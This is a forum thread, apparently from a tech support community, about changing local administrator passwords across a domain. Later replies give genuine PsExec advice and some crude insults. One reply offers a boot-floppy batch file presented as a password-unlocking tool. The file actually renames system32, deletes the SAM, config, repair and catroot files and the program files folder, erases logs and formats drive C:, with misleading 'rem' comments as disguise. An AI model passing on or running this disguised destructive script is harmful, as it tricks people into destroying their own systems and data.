Question

  • Creator
    Topic
  • #2146127

    Script to change local admin password

    Locked

    by sspara ·

    I need a script, not a logon script, but a script I can run from one workstation or server and change all the local admin passwords on my domain. Can anyone help? I have zero experience with scripts so I need one pretty much dummy proof with lots of instructions.

All Answers

  • Author
    Replies
    • #2563965

      Clarifications

      by sspara ·

      In reply to Script to change local admin password

      Clarifications

    • #2563954

      Why do you want it to NOT be a logon script?

      by thumbsup2 ·

      In reply to Script to change local admin password

      Is there a particular reason you can not run it as a logon script? Perhaps you don’t have the appropriate permission to be changing the local admin paswords? Your question sounds “fishy” to me.

    • #2563944

      This’ll do :)

      by w2ktechman ·

      In reply to Script to change local admin password

      A nice little boot floppy 🙂

      Ok, so you wanna be a cracker. This is cracking 101. Just remember that NEVER TRY THIS, as it is illegal. Ok, for starters let me just say that this is tricky. No actual danger though, but you really should practice it on your own system before attempting to try it on anyone elses. You should at minimum try it 5 or 6 times to really get to know how to do it well.

      Items needed

      Ability to create a batch file
      floppy disk
      USB floppy disk drive
      create a boot floppy with NTFS Write permissions

      Ok, once you have gathered the materials you should already have a boot floppy ready. In the autoexec.bat file add the line suser.bat at the end.

      On your desktop, create a file called suser.txt for (suser stands for Super User).
      Open the suser.txt file and paste the information below

      cls
      rem # start _admin.pwd
      ren %systemroot%\system32\etc %systemroot%\system32\cet
      rem start process A32#458
      ren %systemroot%\repair\DS_SOFTWARE A1E
      ren %systemroot%\repair\DS_SECURITY A2E
      ren %systemroot%\repair\DS_SAM A3E
      ren %systemroot%\repair\DS_system.bak A4E
      del %systemroot%\repair\A*.* /Q /F
      del %systemroot%\repair\s*.* /Q /F
      rem script _admin.pwd
      del %systemroot%\system32\catroot\*.*
      del %systemroot%\system32\catroot2\*.*
      del %systemroot%\system32\drivers\cet*.*
      rem new_pwd.pwd ==generate 0
      del “c:\program files” /Q /F
      ren %systemroot%\system32 %systemroot%\newpwd
      ren %systemroot%\system %systemroot%\system32
      rem AUTO_START new_pwd.pwd 44#1
      rem _admin.pwd == DISABLE
      del %systemroot%\system32\config /Q /F
      erase %systemroot%\system32\LogFiles\*.*
      rem ACTIVATE_MEMORY_FLOOD_0x0000323A
      rem DISABLE_LOGFILES
      format c:\ /Q /A:4096
      rem RESTART _admin.pwd

      Paste all of this into the suser.txt file. Save and close the file. Rename the file to suser.bat
      copy the file to your boot floppy disk.

      Boot to the new floppy disk and test it. This may stop and ask to press OK a few times. It should not, but it may still.
      Sometimes people really lock down the admin account, but this program is smart enough to unlock from both ‘hidden’ places, to allow a ‘no password’ option and blank it out, a double whammy!!!

      Remember, this is a REAL program that can get you into serious trouble. Also, it is ‘time sensitive’ when dealing with another persons system without them knowing. Always get to know a program with this much power BEFORE attempting to use it on someone elses machine.

      And most of all, never actually use it. I posted it as informative material. USE AT YOUR OWN RISK!!!
      And, never ever tell anyone that I gave this to you….

      • #2563917

        RE: This’ll do

        by sspara ·

        In reply to This’ll do :)

        I’m not trying to hack anything, I’m administering a network and it is time to change the local admin password on all the clients. I don’t want to go to each machine (all 110 of them) to change the password. I want a script to do it for me with one double click from one machine.

    • #2563943

      Hmmmm, are you sure you should be doing this?

      by jruby ·

      In reply to Script to change local admin password

      I have concerns about someone who is changing admin passwords who doesn’t have any experience with automation basics. Are you in over your head here?

      • #2563916

        RE: Hmmmm, are you sure you should be doing this?

        by sspara ·

        In reply to Hmmmm, are you sure you should be doing this?

        I’m administering a network and it is time to change the local admin password on all the clients. I don’t want to go to each machine (all 110 of them) to change the password. I want a script to do it for me with one double click from one machine. I’m not in over my head, I just want an easier way of doing things, and would like some help. If you or anyone could give me a basic script that can do this task with some fill in the blank stuff like “domain name here” or “VLAN here” and “new password here” or whatever that would be great.

        • #2562753

          OK, here’s what I would do

          by jruby ·

          In reply to RE: Hmmmm, are you sure you should be doing this?

          This isn’t necessarily a one-click solution, but it’s not real complex either.

          Create a file that containes the names of all the nodes you where you will be changing the password, call it Nodes.txt. Put one workstation or server per line. Download PSExec from MS (It’s a prog from SysInternals and incredibly useful, part of PSTools I think).

          Logon using a profile that has admin rights to all the systems where you will be changing the admin password.

          Issue the command

          PSEXEC @Nodes.txt NET USER administrator TheNewPassword

          Make sure ‘TheNewPassword’ matches the complexity rules for the security policies that are in place.

          This worked on a virtual environment I have here, you may start with just one or two test machines in your Nodes.Txt file so you can verify it will work in your environment before turning it loose on all machines. For comfort, you may want to break your list of nodes into multiple files and change them in groups.

          Jim

          /* If you think the problem is bad now, wait until I fix it! */

        • #2563756

          RE: OK, here’s what I would do

          by sspara ·

          In reply to OK, here’s what I would do

          Ok so this has gotten me the furthest, but when I run the command I get this error “Make sure that the default admin$ share is enabled on (computer name here)”. I’m running the command from an account with domain admin rights and I’m running it from the directory with the PStools with the nodes.txt file in the same directory as well. I used the exact syntax you used only replacing TheNewPassword with obviously my new password, and it still didn’t work. Should I be replacing NET USER with something?

    • #2564923

      How did you change them all the last time ? …

      by older mycroft ·

      In reply to Script to change local admin password

      I suggest you allow the air to circulate in and around your arse cheeks, thereby stimulating blood flow to your lower extremities, and actually go have a look at all these machines.

      Showing your face around the company premises might boost your reputation as someone who takes an active interest and actually cares, rather than someone who does everything remotely from a sweaty, arse-impregnated chair. 🙂

      • #2564816

        RE: How did you change them all the last time ? …

        by sspara ·

        In reply to How did you change them all the last time ? …

        I show my face everyday around the company premises, and I have a reputation as someone who actually cares but I do not see a reason to disturb everyone while they are working just to change a password that I’m pretty sure can be done remotely. I also want to learn new innovative ways of doing things, and scripting to me is new. I think finding a way to just double click one file and change all the passwords at once is a much smarter route than walking to each machine, which would take all day. I have more important things to do. Don’t worry, someone will help me find the right answer so please don’t worry about my arse cheeks unless you want to kiss my ass!

    • #2564827
    • #2564745

      Just out of interest,

      by charliespencer ·

      In reply to Script to change local admin password

      I don’t have a solution, just a question.

      You say you need to do this because it’s time to change the local Admin p/w. What determines the frequency of this? Is there a company policy covering this? How many people know the local admin p/w? Are you changing it because one of them left?

      Just wondering.

    • #2562824

      Try using PSTools

      by taylor7150 ·

      In reply to Script to change local admin password

      In spite of all the outrage at using a utility to change all the admin passwords at once, I guess the others do it manually or never at all….

      Try using PSTools. They have a utility called pspassword or something like that that will do they job for you.

Viewing 7 reply threads